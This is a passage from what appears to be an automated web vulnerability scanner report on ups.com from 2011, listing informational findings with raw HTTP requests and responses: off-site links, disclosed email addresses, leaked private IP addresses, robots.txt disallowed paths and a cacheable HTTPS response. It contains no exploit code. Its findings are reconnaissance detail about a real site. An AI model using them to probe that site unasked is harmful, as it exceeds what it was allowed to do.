Content-Type: text/html; charset=utf-8
Content-Length: 45063


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.36. http://www.ups.com/content/us/en/resources/track/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/track/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/track/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:04 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42639


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.37. http://www.ups.com/content/us/en/shipping/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/shipping/index.html?WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58294


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.38. http://www.ups.com/content/us/en/shipping/time/service/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/time/service/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/shipping/time/service/index.html?WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56144


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.39. http://www.ups.com/content/us/en/siteguide/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/siteguide/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/siteguide/index.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61537


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.40. http://www.ups.com/content/us/en/tracking/fgv/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/fgv/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/tracking/fgv/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="http://www.ups-scs.com/tools/fgv/index.html" target="_blank">Learn More<img src="/img/1.gif" alt="" width="3" height="8" border="0">
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="https://fgv.ups-scs.com/fgv/admin_login.build_logon">Request access to Flex Global View</a>
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="https://fgv.ups-scs.com/fgv/admin_login.build_logon" target="_blank">Current customer log-in<img src="/img/1.gif" alt="" width="3" height="8" border="0">
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="http://www.ups-scs.com/transportation/">Transportation and Freight</a>
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="http://www.ups-scs.com/logistics/">Logistics and Distribution</a>
...[SNIP]...
<img alt="" src="/img/icn_arrow_blue.gif" border="0" height="10" width="10"><a href="http://www.ups-scs.com/international/">International Trade</a>
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.41. http://www.ups.com/content/us/en/tracking/quantumview/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/quantumview/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/tracking/quantumview/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45960


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.42. http://www.ups.com/content/us/en/tracking/tools/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/tools/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/tracking/tools/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36524


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.43. http://www.ups.com/dropoff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dropoff?loc=en_US&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30359


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.44. http://www.ups.com/sf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /sf

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sf?loc=en_US&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15216


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<div class="arrow-blue"><a href="http://get.adobe.com/flashplayer/">Get Adobe&reg; Flash&reg; Player</a>
...[SNIP]...
<dt><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Feedback" alt="[+] Feedback" src="/img/icn_plus_black.gif" width="9" height="9">
...[SNIP]...

6.45. http://www.ups.com/upsmobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /upsmobile/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /upsmobile/?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 10761
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


...[SNIP]...
</span><a href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=336377331"><span style="color: #330000">
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 5 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.ups.com/WebTracking/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /WebTracking/track

Issue detail

The following email address was disclosed in the response:

Request

GET /WebTracking/track HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<A
href="mailto:totaltrack@ups.com">totaltrack@ups.com</A>
...[SNIP]...

7.2. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100624_fraud.html

Issue detail

The following email address was disclosed in the response:

Request

GET /content/us/en/about/news/service_updates/20100624_fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<A href="mailto:fraud@ups.com">fraud@ups.com</A>
...[SNIP]...

7.3. http://www.ups.com/content/us/en/contact/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/contact/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /content/us/en/contact/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34848


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<a href="mailto:fraud@ups.com">
...[SNIP]...

7.4. http://www.ups.com/content/us/en/resources/ship/fraud.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/fraud.html

Issue detail

The following email address was disclosed in the response:

Request

GET /content/us/en/resources/ship/fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63878


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com">fraud@ups.com</A>
...[SNIP]...
<A href="mailto:fraud@ups.com">fraud@ups.com</A>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com">fraud@ups.com</A>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...
<A href="mailto:fraud@ups.com"><STRONG>fraud@ups.com</STRONG>
...[SNIP]...

7.5. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/privacy.html

Issue detail

The following email address was disclosed in the response:

Request

GET /content/us/en/resources/ship/terms/privacy.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:01 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50535


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<A href="mailto:webmaster@ups.com">webmaster@ups.com</A>
...[SNIP]...

8. Private IP addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


8.1. http://www.ups.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes HTTP/1.1
Host: www.ups.com
Proxy-Connection: keep-alive
Referer: http://www.ups.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:15:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: defaultHome=us_en_home|1297646131685; domain=.ups.com; expires=Tuesday, 14-Feb-2012 01:15:31 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 124123


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script type="text/javascript" src="/assets/ql/quicklinks.js?V=10.7.1.0">
...[SNIP]...

8.2. http://www.ups.com/content/us/en/index.jsx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /content/us/en/index.jsx?WT.svl=BrndMrk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 123916


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script type="text/javascript" src="/assets/ql/quicklinks.js?V=10.7.1.0">
...[SNIP]...

9. Robots.txt file  previous  next
There are 2 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


9.1. http://www.ups.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:14:30 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 14:05:11 GMT
Accept-Ranges: bytes
Content-Length: 166
Vary: User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /content/us/en/preferred/lws_2.html
Disallow: /content/us/en/preferred/lws_1.html
Disallow: /content/us/en/preferred/lws_index.html
Allow: /


9.2. https://www.ups.com/myups/registration  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/registration

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:16:37 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 15:40:21 GMT
Accept-Ranges: bytes
Content-Length: 163
Vary: User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /content/us/en/shipping/lws_2.html
Disallow: /content/us/en/shipping/lws_1.html
Disallow: /content/us/en/shipping/lws_index.html
Allow: /


10. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


10.1. https://www.ups.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ups.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.ups.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
